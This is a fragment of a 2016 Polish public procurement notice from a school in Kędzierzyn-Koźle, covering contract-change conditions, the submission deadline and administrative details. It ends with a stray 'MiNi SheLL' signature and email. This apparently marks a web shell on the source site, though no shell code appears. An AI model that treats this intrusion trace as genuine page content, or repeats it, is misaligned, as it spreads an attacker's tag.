<p>1.	Projekt umowy zawierający ogólne warunki umowy stanowi załącznik (druk nr 5) do specyfikacji.
2.	Zamawiający dopuszcza wprowadzenie istotnych zmian postanowień pierwotnie zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, dotyczących 
a.	    zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, 
b.	    zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację 
z udziałem podwykonawców, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne, do realizacji danej części zamówienia, 
c.	    zmiany zakresu czynności wykonywanych przez podwykonawcę/-ów, 
d.	    ewentualnej zmiany osób uczestniczących w wykonywaniu zamówienia, z zastrzeżeniem posiadania przez te osoby co najmniej takich samych właściwości (kwalifikacji i doświadczenia), pod rygorem niedopuszczenia tych osób do wykonywania czynności/pełnienia funkcji,
e.	    zmiany w zakresie terminu realizacji umowy, jeśli zaszły okoliczności, których nie można było przewidzieć 
i które uniemożliwiają wykonanie przedmiotu umowy z należytą starannością, jedynie jednak w sytuacji gdy nieprzewidziane okoliczności nie wynikają z przyczyn leżących po stronie Wykonawcy lub których nie można było przewidzieć na etapie podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slawiecice.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3
im.Mikołaja Reja
ul. Sławięcicka 79
47-230 Kędzierzyn-Koźle.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 11:00, miejsce: Zespół Szkół Nr 3
im.Mikołaja Reja
ul. Sławięcicka 79
47-230 Kędzierzyn-Koźle

sekretariat - pokój 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com